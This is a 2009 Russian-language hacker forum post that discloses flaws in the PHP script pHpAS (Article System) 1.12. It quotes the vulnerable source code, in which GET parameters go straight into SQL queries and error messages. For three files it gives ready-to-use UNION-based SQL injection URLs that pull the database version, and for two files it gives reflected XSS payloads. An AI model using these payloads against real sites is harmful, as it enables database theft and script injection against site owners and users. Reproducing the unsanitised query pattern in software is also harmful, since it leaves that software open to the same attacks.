15.11.2009, 01:40
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
Product: pHpAS (Article System)
Author: unnamed
Version: 1.12
SQL
file: show.php
PHP код:
...
f(isset($_GET['id'])) {
$sql = "SELECT * FROM arts WHERE id=".$_GET['id'];
$resultaat = mysql_query($sql);
...
target: show.php?id=-1+union+select+1,2,version(),4/*
file: show_comments.php
PHP код:
if(isset($_GET['nr'])) {
$sql = "SELECT * FROM comments WHERE nr=".$_GET['nr'];
$resultaat = mysql_query($sql);
target: show_comments.php?nr=-1+union+select+1,2,3,4,version(),6/*
file: comments_all.php
PHP код:
$sql = "SELECT * FROM comments WHERE id=".$HTTP_GET_VARS['id']."";
/* Тут писатель совсем разленился,даже проверок нет :( */
target: comments_all.php?id=-1+union+select+1,version(),3,4,5,6/*
XSS
file: show.php
PHP код:
...
if (mysql_num_rows($resultaat) >0) {
..
else{
echo 'geen resultaten gevonden voor id='.$_GET['id'];
...
target: show.php?id="><XSS>
file: show_comments.php
PHP код:
if (mysql_num_rows($resultaat) >0) {
...
}
else{
echo 'geen resultaten gevonden voor id='.$_GET['id'];
target: show_comments.php?nr="><XSS>
Последний раз редактировалось m0Hze; 15.11.2009 в 15:58..
|
|
|